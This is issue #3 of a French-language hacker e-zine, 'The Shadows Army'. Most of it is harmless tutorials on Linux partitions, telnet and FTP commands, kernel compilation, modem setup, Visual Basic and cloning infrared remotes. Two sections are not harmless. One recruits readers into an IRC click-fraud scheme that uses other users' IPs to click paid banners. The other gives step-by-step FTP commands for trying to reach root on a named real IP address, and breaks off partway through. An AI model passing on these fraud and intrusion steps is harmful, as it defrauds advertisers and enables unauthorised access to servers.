     "Les newbies d'aujourd'hui sont l'élite de demain"     
      __ ____ ______ __     ___ __ _____   __ _____ _____   
     |;              #3|   /           .| |             .|   
     |;:               .  /    _ ____ __| |;   ____ _    |    
     |,__ __      ___ _| /    /           |   |      |   |    
           |     |      /    /            .   |      |   |    
           |     |     |;   |             |   |___ __.   |    
           |     |     |:   \___ ____     |              |    
           |:    |     |.            \    |;    _ __     .   
           |;    |      \__ __ _      |   |:   /    \    |    
           |     |              |.   /    .   |      |   |  
           |    .|             /    /     |   |      .   |  
    _  __ /__ ____\ __ _ _____/    /     /    |      |   |  
                                  /     /.    |      |   |   
     _ _ _ ___ _____ __ ____ ____/     /___ __|      |___|


                                                               
**************************************************************
*  -=THE SHADOWS ARMY=-                                      * 
*                                                            * 
*  Tout ce que vous pourrez lire dans ce zine est à un but   *
*  éducatif seulement. Si vous causez des dommages  ou que   *
*  vous vous faites pogner c'est de votre faute.             *
*                                                            *
*  URL : http://tsarmy.cjb.net                               *
*  E-MAIL : tsarmy@hotmail.com                               *
*  IRC : Undernet - #TSARMY                                  *
**************************************************************


Disclaimer:
-----------
Bienvenue dans ce nouveau numéro. C'est dur de sortir un
e-zine en ce moment vu la concurence, mais qui  ne tente 
rien n'as rien, alors on se lance, meme si dès le départ 
on a pas beaucoup  de  chance. Bon, je vous souhaite une 
bonne  lecture à tous et j'espère  que  vous  aimerez ce 
numero.


Table des Matières:
-------------------
1. Les partitions et linux                    - |-OnYx-|
2. Les attitudes d'un hacker                  - DECdeamon
3. Commandes Telnet                           - |-OnYx-|
4. Comment compiler son noyau en linux        - |-OnYx-|
5. Configuration d'un modem rapide sous linux - |-OnYx-|
6. Tutorial sur le Visual Basic               - MaRsHaLL
7. Les Commandes FTP                          - |-OnYx-|
8. Piratez son magnétoscope                   - Inconnu
9. Comment faire de l'argent facile           - [Jideel]
10. Comment passer root avec FTP              - {Sliver}
11. Hacker son windows NT                     - putois
12. Hacker son windows NT #2                  - putois
13. Fin du #3                                 - TSARMY



************************************************************
=-=-=-=-=-=-=-= 1. Les partitions et Linux =-=-=-=-=-=-=-=-=
************************************************************


Une partition c'est quoi?

Lorsque  vous  achetez un nouveau disque  dur, celui-ci  est
totalement vide.Pour l'utiliser, il va falloir le partition-
ner.  Partitionner,  c'est  découper  le  disque  en  une ou 
plusieurs parties,  afin qu'il  soit  reconnu par le système 
d'exploitation utilisé.  Une  partition est donc une tranche
du disque dur qui,  une  fois formatée,  pourra contenir les 
données du système d'exploitation et de l'utilisateur.

Pour partitionner un disque dur, il faut un utilitaire. Pour
Linux, deux utilitaires  se  démarquent, fdisk et le nouveau 
Disk Druid.

Pour l'instant je vais vous expliquer les noms des partition
sous DOS et sous Linux, afin de  bien saisir les différences
entre les deux systèmes.

Les partitions sous DOS :
-------------------------
Sous DOS,  que  l'on  possède  un disque dur IDE ou SCSI, on
trouvera  les  memes  noms.  DOS  ne  peut  gérer  que  deux 
partitions: une "primaire"  et une "secondaire". C'est cette 
dernière  que  l'on  divisera  en lecteurs logiques. Si vous 
n'utiliser  qu'un  seul  disque dur,  les noms de partitions 
sont de toutes façons comme ca :

La première partition, dite "partition primaire",  deviendra 
C: La seconde, dite "partition secondaire", sera celle  dans 
laquelle  vous  spécifierez  un  ou  des  lecteurs  logiques 
(D: E: etc.).

Les partitions sous Linux :
---------------------------
Pour définir  les  partitions,  le système Linux utilise une 
combinaison de lettres et de chiffres  (hda1,hdb2,sda4,sdc2,
etc.) qui peut paraître confus pour les nouveaux utilisateurs.

Les deux premières lettres indiquent le type de périphérique 
sur lequel est installée la partition. Pour les disques durs
IDE, on utilise "hd" pour les disques durs SCSI,  on utilise 
"sd".

La lettre suivante  indique  le périphérique sur  lequel est 
installée la partition. Pour une partition installée sur  le 
premier disque dur IDE on utilise /dev/hda (/dev/hdb pour le 
second disque, etc.). Pour  une  partition  installée sur le 
premier disque dur SCSI, on utilise /dev/sda (/dev/sdb  pour
le second disque, etc.).

Le  chiffre  définit  la  partition.  Les  quatre  premières 
partitions (primaire et étendues) sont numérotées  de 1 à 4. 
Les  partitions  logiques  sont  numérotées  à  partir de 5. 
Exemple,  pour  la troisième partition (primaire ou étendue) 
du premier disque dur IDE, on utilise /dev/hda3.

Exemples :
----------
hda1 pour la première partition du premier disque dur IDE
hda2 pour la deuxième partition du premier disque dur IDE
hdb1 pour la première partition du deuxième disque dur IDE
sda4 pour la quatrième partition du premier disque dur SCSI

                                      |-OnYx-|


============================================================
"A force de vouloir nous censurer on va finir par croire que 
nos propos risquent d'atteindre leurs buts."
============================================================


************************************************************
=-=-=-=-=-=-=- 2. Les attitudes d'un hacker =-=-=-=-=-=-=-=-
************************************************************

      Il me semble que les hackers devraient tous se  
serrer  les  coudes... et  il  me semble  que  c'est 
cette attitude qui manque le plus dans l'underground 
autant  francophone  qu'anglophone.  Tous  devraient 
s'aider  et partager leurs connaissances et réalisa-
tions  avec les  autres.  Un problème  que  je  vois 
souvent,  ce  sont  les  hackers  (de n'importe quel 
niveau d'expérience... du vrai élite au wannabe) qui 
se pensent les meilleurs et que  rien ni personne ne 
peut les surpasser. Je suis phreaker, et les gens me 
reconnaissent comme  tel mais j'avoue que je ne suis 
pas le meilleur,  et  pas  si  bon  que ca. J'ai des 
qualités  et  des  défauts,  comme  tout  le  monde. 
Prenons  l'exemple des warlordz  (WaR^L0rDz sent toi 
pas visé!): |-OnYx-| a un jour mensionné un  site ou 
quelques  hackers  qui  se donnaient l'appélation de 
warlordz. Peut-être sont-ils vraiment  bons, mais de 
répéter  sur  chacune  de leurs HTML qu'ils sont des 
élites,  qu'ils   sont  les  meilleurs  et  que  les 
lecteurs  de   leur  site  sont   des  imbéciles  et 
ignorants, c'est éxagéré et à  mon  avis cela prouve 
qu'ils ne  sont  pas  de vrai hackers. Ne devrait-on 
pas  être   discrets  et  modestes,  s'entraider  et 
participer  à  la continuité d'Internet, qui devrait 
être   un   outil   d'apprentissage  pour  tous,  de 
recherche   d'information,  de  communication  et de 
consolidation  de  la solidarité humaine, plutôt que 
d'être  un  lieu  dangereux ou le moindre risque est 
fatal?  Les  vrais  hackers  ne détruisent pas, mais 
rendent l'Internet  un  monde  plus viable... Ils en 
sont les vrais artisans.

Vous pouvez en juger par vous-mêmes: 

http://www.famipow.com/warlordz/

                                 DECdeamon


************************************************************
=-=-=-=-=-=-=-=-=-=- 3. Commandes Telnet =-=-=-=-=-=-=-=-=-=
************************************************************

Voilà un petit résumé des commandes telnet.

Commande        Description
--------        -----------
close           Termine la connexion en cours.
logout          Termine la session telnet.
display         Affiche l'occupation du clavier.
mode            Commute entre mode lignes et mode
                caractères; saisissez "line" ou "caracter".
open "hôte"     Etablit une connexion avec l'hôte donné.
quit            Termine la connexion et la session telnet.
send            Transmet des caractères spéciaux.
set             Fixe les paramètres d'exploitation.
unset           Supprime les paramètres d'exploitation.
status          Affiche des informations d'état concernant
                la session telnet en cours.
toggle          Commute entre les paramètres d'exploitation.
sic             Affiche l'état des caractères spéciaux.
z               Fait passer la session telnet en cours à 
                l'arrière plan. Pour la faire revenir au
                premier plan, saisissez la commande "fg".
!               Appelle un sous-shell.
environ         Modifie l'occupation des variables 
                d'environnement.
?               Affiche un texte d'aide.

                                 |-OnYx-|


============================================================
"Le vrai hacker est celui qui sait reconnaitre la limite de 
ses connaissances"
============================================================


************************************************************
=-=--=-=- 4. Comment compiler son noyau en linux =-=-=-=-=-=
************************************************************

Configuration:
--------------
Bon, pour commencer la configuration, passez 
dans le répertoire : /usr/src/linux
Ensuite pour exécuter la configuration par "config"
écrivez: make config
Pour le faire par "menuconfig" écrivez: make menuconfig
A la fin, tous les paramètres saisis sont rangés dans le
fichier .config qui commande la suite du déroulement.

Compilation:
------------
Le plus gros du travail est deja fait, le reste c'est
l'assistant qui s'en charge en suivant vos instructions.
L'étape suivante prend en considération les 
drivers: make dep
Ensuite le ménage doit être fait: les fichiers temporaires
laissés par chaque processus de compilation sont effacé
du disque dur par la commande: make clean
Ces 2 étapes rapide sont suivi de 2 plus longues:
la compilation: make
Et ensuite la liaison: make zImage 
Ce processus prend du temps, environ 30 minutes sur
un 486 à 50Mhz et 10 minutes sur un Pentium 100.

Pour finir:
-----------
Après une compilation réussie, le nouveau noyau "zImage"
est rangé dans le répertoire /usr/scr/linux/arch/i386/boot
Par sécurité, car rien ne prouve que le nouveau noyau va 
bien marcher, renommer d'abord l'ancien noyau. 
Pour finir si vous avez choisi le démarrage par 
LILO, vous devrez renommer le noyau "vmlinuz".
Bon voilà c'est tout, il y a plusieurs méthodes mais 
celle-la devrais bien marcher.

                                 |-OnYx-|


************************************************************
=-=-=- 5. Configuration d'un modem rapide sous linux =-=-=-=
************************************************************

Linux  limite  normalement les ports serie à 
un de débit 38400 bauds (setup, le programme
de configuration,  demande  le débit maximal
du modem, la  valeur la plus élevée possible
est 38400). Si  vous  disposez  d'un   modem
plus  rapide,  il  faut utiliser la commande
"setserial". Celle-ci  permet  de configurer
un  modem  38400  pour  qu'il  fonctionne  à
57600 bauds, comme ceci: 

  setserial /dev/cua2 spd_hi

Remplacer /dev/cua2 par le nom du  modem que 
vous configurez. La commande:

  setserial /dev/modem spd_vhi

permet d'utiliser  le  modem à 115200 bauds.
Ces  2  options  peuvent  être  faite par un
utilisateur normal (autre que root). 
La commande:

  setserial /dev/modem spd_normal

permet de configurer le port série  à un son 
débit  normal  de  38400  bauds. La commande 
"setserial" fonctionne  avec tous les noyaux 
de Linux à partir de la version 1.0.

                           |-OnYx-|

============================================================
"Si vous chercher un e-zine francais, vous le trouverez
surement sur http://members.xoom.com/lesarchives"
============================================================

************************************************************
=-=-=-=-=-= 6. Tutorial sur le Visual Basic =-=-=-=-=-=-=-=-
************************************************************

Dans ce tutorial, je  vais  vous faire apprendre la base 
de Visual Basic. Je vais commencer par vous familiariser 
dans ce programme.  Sûr que vous  ne serez pas un expert 
du Visual Basic après avoir lu et comprit ce texte, mais 
vous  aller  acquérir  une  base.  Je  vais  vous  faire 
comprendre  le  logiciel  et ces  composant. Nous allons 
faire quelques programmes, comme exemple pour apprendre.
Vous  aller  peut-être  dire  que  c'est  compliquer  et 
fastidieux ce  language, mais c'est  un  language  asser 
simple a comparer certain langage  que je  trouve un peu 
mêlant. Je vais essayer de faire de mon  mieux pour vous 
expliquer le langage,  mais c'est ma première expérience 
pour un toturial. J'aimerais avoir de vos commentaires à 
propos  de  ce  texte  donc,  j'espère  bien, vous aurez 
apprit quelque chose de Visual Basic. 

Installation  de  Visual  Basic:  Dans ce paragraphe, je 
vous  montrerai  comment bien installer Visual Basic, si 
ce n'ont pas déjà fait.  Quand vous installer, vous avez 
choix de  trois  possibilités, Typique : la version avec 
tout les composantes. Personnalisé :  pour les personnes 
avec  plus  de  connaissance sur Visual Basic, car, vous 
pourriez ne pas  mettre des choses donc vous aurez grand 
besoin.   Compresser:  version   donc  je  vous  conseil 
vraiment  pas si  vous avez un ordinateur performant, si 
vous avez  un  ordinateur pas très fort comme un 486, je 
vous conseille la version compresser. Vous pouvez, après 
l'installation   aller  ajouter  des composant du Visual 
Basic,  en  allant tout simplement dans le dossier Setup 
de \devstudio\VB\Setup\Setup.exe .  Référé à cette place 
(Setup) pour aller réinstaller le programme.

Configuration de L'environnement : Vous avez le choix de 
mettre votre programme Visual Basic en format MDI ou SDI. 
SDI : Single  Document Interface, ce format est comme le 
Visual Basic 4. MDI : Multiple Document  Interface. Pour 
aller changer ce format, vous aller tout simplement dans 
la commande Outils/Options et aller à Étendu,  et cocher 
ou décocher  la case Environnement de développement SDI. 
Ceci est  a  votre  désir. Moi je trouve personnellement 
que l'environnement  MDI  est  mieux que l'environnement 
SDI.

Démarrage de Visual Basic : Comme vous voyez, nous avons 
plusieurs  type  de  création pour Visual Basic. Je vais 
vous montrer ce  que signifie tout ces type de création.

Exe   standard:  Quand  vous  sélectionner  ce  type  de 
projet,  vous  avez  un  seul fichier de feuille. Par le 
menu Projet, vous pouvez aller ajouter d'autre feuilles, 
module et modules de classes.  Les modules  de classe ne 
sont  cependant  utilisables  que  localement pour cette 
application  précise.  Si  les classes sont publique, en 
dehors  ce  projet,  vous  devez choisir EXE ActiveX. Le 
type exe  standard est  le  type  que  j'utilise pour la 
plupart des exemples.

Exe ActiveX:  avec  ce  type  de projet, c'est un projet 
comportant  un  seul module de classe que est ouvert. Le 
module  de  classe  prédéfini  est  déclaré  comme étant 
public par l'intermédiaire de la propriété Instancing et 
la valeur 5 - MultiUse  qui  lui ai affectée. Il est par 
conséquent accessible également en dehors  du projet. En 
comparaison avec les types de projet  de Visual Basic 4, 
un  EXE  ActiveX  n'est  rien  d'autre  qu'un  EXE  OLE, 
autrement  dit  un s erveur Out Process. On a en quelque 
sorte  adapté  le  nom  à l'air du temps. En général, on 
complète  un  EXE  ActiveX, toujours par le menu Projet, 
avec  des  feuilles,  des  modules et éventuellement des 
modules  de  classe  supplémentaire. Les classes ne sont
cependant  pas  obligatoirement  publiques.  Vous pouvez 
aussi décider de réserver  les modules de classe supplé-
mentaires au seul projet en cours. Par définition, aucun 
objet  spécifique  n'est  désigné  pour  l'exécution  du 
programme dans un EXE ActiveX, mais en général  c'est la
routine Sub Main, qui est définie dans un module de code 
source, qui fait office d'objet de démarrage. L'objet de 
démarrage est  défini dans  l'onglet Général de la boîte 
de dialogue Propriétés du projet.

DLL ActiveX: un DLL ActiveX est un DLL OLE qui s'exécute 
en  tant  que  server  In  Process  dans la même zone de 
mémoire que l'application utilisant cette DLL. Le projet 
se présente de la même manière qu'un  EXE ActiveX, si ce 
n'est  que  son  type est différent. Un module de classe 
public  est  crée  que l'on peut compléter avec d'autres 
fichiers de projet en cas de besoin. Dans un DLL ActiveX, 
L'exécution  du  programme  démarre  également  dans  la 
routine Sub Main.

Contrôle ActiveX:  Visual  basic  5 permet de programmer 
des contrôles en syntaxe  Visual Basic.  Lorsque ce type 
de  projet  est  sélectionné, un fichier de contrôle est 
automatiquement crée. Il contiendra le code du contrôle. 
A  l'instar  d'un fichier  de  feuille,  un  fichier  de 
contrôle se compose d'une zone de conception visuelle et 
du code source associé. Si nécessaire, ce type de projet 
peut également être complété par des modules, modules de
classe et feuilles supplémentaires. Il n'y a pas d'objet 
de démarrage spécifique pour un projet de contrôle.

Assistant  Création  d'application:  derrière ce type de 
projet se cache un assistant à l'aide duquel vous pouvez 
définir  de  manière  interactive  une structure de base 
pour  une  nouvelle  application.  Il  vous  propose par 
exemple de choisir votre programme en format MDI ou SDI. 
Il  crée  votre  programme a partir de vos décisions sur 
les question demandé au début.  Vous  avez  une série de 
questions  à  répondre,  des  question a propos de votre 
choix  de  votre  interface,  les  pages de votre choix, 
comme ex, une page de ( à propos ). Il  vous suffi juste 
de  complété  le  code  source  apres  avoir remplit les
questions  pour  votre  programme,  plus rapide, mais ce 
n'est pas toujours comme on le souhaite vraiment.

Contrôle  de  VB  Édition  Professionnelle  ce  type  de 
projet correspond au type EXE  standard  si ce n'est que 
les  contrôles  supplémentaires de l'édition profession-
nelle de Visual Basic 5, dans la boîte a outils.

Complément:  Vou s sélectionnez  ce  type si vous voulez 
programmer  un  Add-In.  C'est à dire un complément pour 
l'environnement   de   développement  Visual  Basic.  Un 
fichier  feuille,  un  module  de  code  et un module de 
classe   sont   automatiquement   générés.   Toutes  les 
instruction  nécessaires  pour  attacher le complément à 
l'environnement  de  développement  et pour l'en séparer 
à nouveau sont déjà contenues dans le code  source. Vous 
devez  encore  indiquer  un  nom  d'application. Pour le 
reste, un Add-In correspondra au type de EXE ActiveX.

DLL Document ActiveX / EXE Document ActiveX: un document 
ActiveX  est  un  document  Visual  basic  pouvant  être 
affiché  dans  un  conteneur  ActiveX,  par exemple dans
Internet Explorer. Pour l'affichage,  il faut un serveur 
Visual  Basic,  nécessairement  sous  forme de composant 
ActiveX (EXE ou DLL). Le  contrôle  OLE  peut  pas  être 
utilisé dans les documents ActiveX.

Un peu après:  Normalement vous avez choisi EXE standard 
ou  Contrôles  de  VB  Édition  Professionnelle, c'est à 
votre choix,  vous  voyez une image comme plus bas. Ceci
s'appelle  une  Form. C'est votre fenètre principal pour 
faire  votre  programme.  Vous avez sûrement deviner que 
vous pouvez agrandir c ette  fenêtre manuellement. C'est 
dans ceci que vous  installer vos contrôle a votre choix 
pour votre programme.

Pour  cette  fois-ci, j'ai pas beaucoup d'idées pour des 
exemples... ON  va  faire  un  programme qui se sert des 
MsgBox (petite boite a message)... Vous aller  peut-être 
dire  que  c'est nul,  mais là,  je pense  pas que tu va 
faire des programmes de fou pour commencer ;) Bon...  La 
vous aller avoir besoin de l'image que je vous ai donner 
pour votre programme car la plupart des informations son 
dedans.

[ Pour l'image ]

-Pour aller changer  l'apparence du bouton (texte sur le 
 bouton), cette  propriété s'appelle Caption, et changer 
 le nom est "Name"... asser simple.
-Pour  changer  le texte écris sur  les Labels ( pour du 
 texte ), ben c'est la propriété "Caption".
-Pour changer la grosseur et la police du texte, il faut 
 aller dans "Font"
-Pour ajuster automatiquement la grosseur des Label avec 
 le texte, vous pouvez tout simplement  aller changer la 
 propriété "Autosize" pour "True"

 (exemple.jpg est attaché avec ce e-zine)

---------------------------------------------------------

Bon, on va rentrer le code du programme. Vous cliquer 
2 fois  sur  le  bouton  Afficher et taper ceci entre 
Private Sub Afficher_Click() et End Sub.

[ Code ]

Private Sub Afficher_Click()
    If (pigra.Value = True) Then
        MsgBox "PiGrA", 0, "Exemple 1"
    End If
    If (hello.Value = True) Then
        MsgBox "HeLLo", 0, "Exemple 2"
    End If
End Sub

---------------------------------------------------------

C'est  juste  ce  code que vous aller marquer, mais, je 
vais  faire  mon possible pour vous faire comprendre le 
code.  Premièrement  le  If (****.Value = True),   cela 
signifie  que  si la case est cocher alors... (then) Le 
".value" c'est sa qui designe si il est cocher (valeur, 
cocher  ou  non)  MsgBox "****", 0,"***" :  c'est  tout 
simplement la declaration de la boite a message (msgbox)
"****", 0,"***" :  au  debut,  c'est  le  texte dans la 
boite, le "0", c est la forme de la boite,  vous pouvez 
changer  le  numero et vous aller voir les changements, 
et le texte apres,  c'est le titre du MsgBox. Le End If 
déclare  la  fin  du  If (pigra,value).  Si  vous faite 
l'exemple,  vous  aller  comprendre.  Apres  vous aller 
marquer  le  code suivant, cliquer 2 fois sur le bouton
"Quit" et marquer tout simplement "end" (ne marquer pas 
les 2 ""). Le End signifie de sortir  du programme tout 
simplement.

Bon, là j'ai fait mon possible et c'est mon  premier
article, alors ne soyer  pas trop méchant envers mon 
article,  je  sais  que  sa donne pas grand chose ce 
programme, mais c'est la connaissance des contrôles.

                      MaRsHaLL

                      E-Mail: microt@globetrotter.qc.ca

============================================================
"Respectez les autres dans ce qu'ils font si vous ne faites
pas mieux vous-mêmes"
============================================================

************************************************************
=-=-=-=-=-=-=-=-= 7. Les Commandes FTP =-=-=-=-=-=-=-=-=-=-=
************************************************************

Sur tout système Unix, un client FTP permet d'utiliser 
le protocole FTP (File Transfer Protocol), à la ligne 
de commande. Voilà un résumé de toutes les commandes 
disponible.

Commande:                  Description:
---------                  ------------
Commandes de Bases
------------------
?                        Donne une vue d'ensemble
                         des commandes disponibles.
? commande               Donne un bref descriptif
                         de la commande donnée.
!                        Exécute un sous-shell sur
                         l'ordinateur local.
! commande               Exécute la commande donnée,
                         dans un sous-shell sur
                         l'ordinateur local.
bye                      Termine la session en cours.
help                     Identique à ?
quit                     Identique à Bye.

Commandes de Connexion
----------------------
account [mot_de_passe]   Transmet le mot de pass néces-
                         saire à l'ordinateur distant.
open [hôte]              Ouvre une session sur l'ordinateur
                         distant, donné par l'hôte.
close                    Termine la connexion FTP courante
                         sans quitter le programme.
disconnect               Identique à close.
user [nomutilisateur     Modifie le nom utilisateur au
[mot_de_passe]]          cours de la session FTP.

Commandes concernant les Répertoires
------------------------------------
cd [répertoire]          Passe dans le répertoire donné.
                         La saisie de la commande sans 
                         argument ne fait pas revenir au
                         répertoire racine comme au niveau
                         du shell, mais provoque la demande
                         du répertoire cible.
cdup                     Fait passer au répertoire parent
                         (correspond à cd..).
delete [nom_fichier      Supprime le fichier donné sur
_distant]                l'ordinateur distant.
dir [répertoire]         Affiche le contenu du répertoire
                         donné.
ls [répertoire]          Affiche le contenu du répertoire 
                         courant ou du répertoire spécifié
                         sur l'ordinateur local.
mkdir [répertoire]       Crée un répertoire sur l'ordinateur
                         distant. Si aucun répertoire n'est
                         spécifié, oblige à répéter la
                         commande.
pwd                      Affiche le nom du répertoire distant
                         courant.
mdir [répertoire]        Supprime le réperoire distant donné.
                         Si aucun répertoire n'est spécifié,
                         la commande oblige à le préciser.
Commandes de transfert
----------------------
append [fichier_local]   Ajoute le contenu du fichier local
[fichier_distant]        à un fichier distant.
cr                       Active ou désactive le filtre de
                         retour chariot. Le filtre est activé
                         par défaut.
get [nomfic.anc          Transmet un fichier d'un ordinateur
nomfic.nouv]             distant à l'ordinateur local. Si
                         aucun nom n'est spécifié, la commande
                         exige de nouveau la saisie. Lorsque
                         nomfic.anc et nomfic.nouv sont donnés,
                         le fichier nomfic.anc est renommé
                         nomfic.nouv sur l'ordinateur local.
mget [liste_fichiers]    Transmet les fichiers spécifiés dans
                         liste_fichiers à l'ordinateurs local.
                         Il faut confirmer séparement la 
                         transmission de chaque fichier si 
                         l'option -i n'as pas été utilisée.
mput [liste_fichiers]    Transmet les fichiers spécifiés dans
                         la liste_fichiers de l'ordinateur
                         local à l'ordinateur distant. Il faut
                         confirmer séparement la transmission
                         de chaque fichier si l'option -i n'a
                         pas été utilisée.
put [nomfic.anc          Transmet un fichier de l'ordinateur
nomfic.nouv]             local à l'ordinateur distant. Si le 
                         nom n'est pas spécifié, la commande
                         exige de nouveau la saisie. Lorsque 
                         les noms de fichier nomfic.anc et
                         nomfic.nouv sont donnés, le fichier
                         est renommé sur l'ordinateur distant.

Commandes de configuration d'options
------------------------------------
ascii                    Permet le transfert de fichier en mode
                         ASCII. Attention: ne tranmettez que des
                         fichiers textes dans ce mode! Utilisez
                         le monde binaire pour les autres
                         fichiers (voir ci-dessous).
bell                     Génére un son après chaque commande sur
                         la console locale.
bin                      Permet le transfert de fichier binaire.
                         Ce monde est nécessaire pour les
                         fichiers image et les fichiers de
                         programmes; avec le mode ASCII, vous ne
                         pourriez plus ni exécuter les fichiers
                         ni les ouvrir.
binary                   Identique à bin
hash                     Provoque l'affichage d'un dièse (#)
                         après chaque transfert de bloc de 
                         1 Koctet. Cet affichage permet de suivre 
                         la progression d'un transfert.
prompt                   Active ou désactive le prompt interactif
status                   Affiche les paramètres courants du
                         programme FTP.

                                 |-OnYx-|

============================================================
"News sur l'Underground Québecois: www.unqc.cx"
============================================================

************************************************************
=-=-=-=-=-=-=- 8. Piratez son magnétoscope =-=-=-=-=-=-=-=-=
************************************************************

Les commandes à distance de magnétoscope,
de  télévision, mais aussi ouverture à 
distance des portes de certaines voitures
sont basées sur une liaison infrarouge.
Pour quelque francs (FF), vous pouvez
munir votre PC d'une telle liaison et lui
permettre de piloter tous ces appareils.
Même les voitures!

Une liaison infrarouge est un rayonnement
électromagnétique (source lumineuse) de
longueur d'onde comprise entre 0.8 µm et 
1 mm, donc invisible à l'oeil nu. L'émmeuteur
de votre télécommande possède deux états:
allumé ou éteint. Lorsque vous appuyez sur
le bouton, vous déclenchez une suite d'éclats
qui sont perçus par le récepteur et ensuite
interprétés. La façon d'interpreter cette 
suite est en fonction de la méthode d'encodage
utilisée. Et elles sont nombreuses ces
méthodes d'encodage, presque autant que les 
constructeurs de télévision! Examinons un
système courant, le RC5.

RC5
---
Le RC5 pour Remote Control version 5 a été
mis au point par Philips. C'est un vrai 
protocole d'échange. Il fait correspondre
à chaque commande une trame, une serie de
bits envoyés dans le temps. En informatique,
un bit est défini par une valeur électrique
par rapport à un niveau zéro. Pour se protéger
de ces interférences, le codage d'un bit en RC5
est une variation du signal. Un signal montant
est interprété descendant comme un 1, un signal
descendant comme un zéro. Une trame RC5 est 
constituée de 14 bits:  

S1 S2 C  A4 A3 A2 A1
A0 B5 B4 B3 B2 B1 B0

Les deux bits de Start, S1 S2, reveillent le
récepteur. Le bit de commande, C, alterne entre
la valeur 0 et 1 pour différencier un appui
continu sur une touche. Le récepteur doit 
distinguer l'appui continu sur l'augmentation
du volume (où il doit continuer à effectuer la
commande) et un doigt qui reste malencontreusement
sur la touche de la chaine 1! A4 à A0 sont les 
5 bits d'adresse. Ils permettent donc de commander 
25, soit 32 systèmes différent: télévision,
magnétoscope, chaîne hi-fi, etc. Les six bits de
commande, B5 à B0, déterminent 64 fonctions 
différente pour chaque systèmes! Un total de 2048
combinaisons. Pour éviter une anarchie certaine,
un comité a attribué une valeur pour chaque
système et pour chaque commande. Par exemple,
un magnétoscope couleurs a l'adresse 5, soit les
bits d'adresse 00101. A la touche "Eject", 
correspondent les bits de commande: 101101.
Lorsque vous appuyez sur ce bouton de votre
télécommande, la trame suivante est émise vers
votre magnétoscope: 11000101101101. L'envoi
d'un bit dure 1,778 ms, la durée d'une trame
est donc de 24,89 ms. Assez rapide pour zapper
plus vite que l'éclair!

J'Capte Rien!
-------------
Tout cela est bien compiliqué et, finalement,
bien inutile! Au lieu d'essayer de comprendre
et de recréer ces méthodes d'encodage, nous
avons déjà une source d'émission de ces 
faisceaux: notre télécommande! Elle produit
directement les faisceaux lumineux à émettre
pour chacune de ses fonctions. Il suffit de 
fabriquer un récepteur pour capter et enregister
les faisceaux liés à chaque fonction. Il suffira
de reproduire à l'identique ce même faisceau par
l'intermédaire d'un émetteur pour lancer la
fonction attachée à ce bouton. Bien sûr, il
faudra, les uns après les autres, stocker les
signaux pour chaque bouton. Mais une fois
cette apprentissage effectué, votre PC 
remplacera complètement votre télécommande.
Il pourra commander de façon beaucoup plus
souple, et en une simple touche, la mise en
route de votre télévision ou de votre 
magnétoscope, le rembobinage de la casette et
la mise en lecture. Et l'ouverture des portes
de votre voiture! Mieux, grâce à un peu de 
programmation, on pourra rassembler en un seul
clic plusieurs commandes, les programmer dans
le temps et même les automatiser avec le 
lancement d'autres applications!

Le Montage:
-----------
Le plan du montage (montage.jpg) est joint 
avec ce e-zine.

Le montage comporte 2 parties: récepteur et
émetteur. Le récepteur est constitué d'un
phototransistor infrarouge pour recevoir et
et apprendre les signaux émis par votre
télécommande classique. L'émetteur est une
LED infrarouge que votre PC allumera et
éteindra pour reproduire à l'identique les
signaux appris. Ces deux circuit seront
interfacés à votre PC par l'intermédiaire
de la prise parallèle. Chez votre détaillant
de composants électroniques, il vous faudra 
environ 20 FF, un phototransitor infrarouge,
une pile 9 volts pour l'alimentation, une 
prise Parallèle mâle, trois résistances,
une de 100 Kohms, une de 100 ohms et une
troisième de 10 ohms, ainsi qu'un 
transistor de type BC 547. A noter que vous
pouvez également trouver par correspondance
ou dans des magasins spécialisé des
photomodule dédiés à la réception infrarouge.
Ils ne reçoivent que les ondes infrarouges,
comportent un préamplificateur de signal et
un oscillateur à 38 kHz pour filtrer 
exactement les trames RC5. Vous aurez de 
bien meilleurs résultats avec ce composant 
très utilisé dans les télécommandes du
commerce. Une référence chez Temic: TSOP1738

Vous trouverez des programmes pour simuler
une télécommande: http://www.ziplabel.com

============================================================
"En passant, je fais une petite pub pour le site de maniak
qui est très bien fait: www.maniak.net"
============================================================

************************************************************
=-=-=-=-=- 9. Comment faire de l'argent facile -=-=-=-=-=-=-
************************************************************

De largent facile ca vous tente? /j #stonecash
En effet sur ce chan on peut faire de l'argent 
facilement et presque légalement, vous connaisser 
les bannières XXX ou autres? Ces bannières vous 
permette de faire 8 cent à 25cent par clic,
comme vous savez, plus il y a de monde qui clic 
dessus plus il y a d'argent qui rentre, le 
problème se situe pour trouver ces personnes qui
vont cliquer sur ces bannières, il y a bien 
évidasment le spam pub sur IRC mais cela ne 
fonctionne presque plus maintenant que tout le
monde sait que ce sont ces adresses :
<Nounoune> Salut, [Tawouin] tu veux voir 
mes photos nus... http://207.36.86.84/babes/
alors un gars a eu la merveilleuse idée de
programmer un script qui clic pour nous
sur nos bannières!

Il utilise les IP des personnes qui sont 
sur le channel #stonecash pour cliquer sur 
les bannières et tous ca se fait automatiquement!
vous n'avez qu'a venir sur le channel et downloader 
les .mrc de C3rv3au en marquant /ctcp C3rv3au script
et suivre la démarche qui va aparaître en priver et 
voila! Tout ce qui vous reste à faire c'est de vous 
abonner à des sites porno ou autre, grâce à une 
commande comme: 
!privategold Jideel http://members.xoom.com/mfluder/ 
que vous passerez à toutes les 5 min sur le channel 
tlm va cliquer sur votre bannière.

Vous pouvez trouver des bannières à www.mostcash.com,
www.rawcash.com et à plusieurs autre place bien sur, 
cependant mostcach on ne sait pas si il envoie des chèques
encore parce que c'est nouveau cette adresse mais rawcash 
en envoie eux.

Pour de plus amples informations par rapport à la commande 
sur le channel /msg c3rv3au jai pas tout comprit le 
fonctionnement de sa commande mais ca va venir...

Donc je vous invite à joindre #stonecash puisque 
plus ya de monde plus il y a de l'argent qui rentre et 
rapellez-vous que c'est US en plus largent.

                               [Jideel]

============================================================
Un nouveau site de News Underground Francophone est entrain
de se développer. Sur ce site, il y aura des commentaires
et critiques sur les différents groupes Underground 
Québécois, et bien sur des News. 

Visitez PADNews: http://www.citeweb.net/geeknews/
============================================================

************************************************************
=-=-=-=-=-=- 10. Comment passer root avec FTP =-=-=-=-=-=-=-
************************************************************

Bon, c'est un vieux exploit, mais il marche
toujours sur certains FTP, à vous d'essayer.

Tout d'abord, vous cliquez sur :

Démarrer
Exécuter
puis vous tappez: ftp -n

Là une fenêtre va s'ouvrir avec la prompt:

ftp>

Là vous marquez "open" suivi du nom 
du site genre:

ftp>open 194.154.198.36
*Message

Lorsque vous serez connecté, tapez:

QUOTE user ftp

*Username accepté, enter password

Tapez ceci par la suite:

QUOTE cwd ~root

*Please login with user and pass before

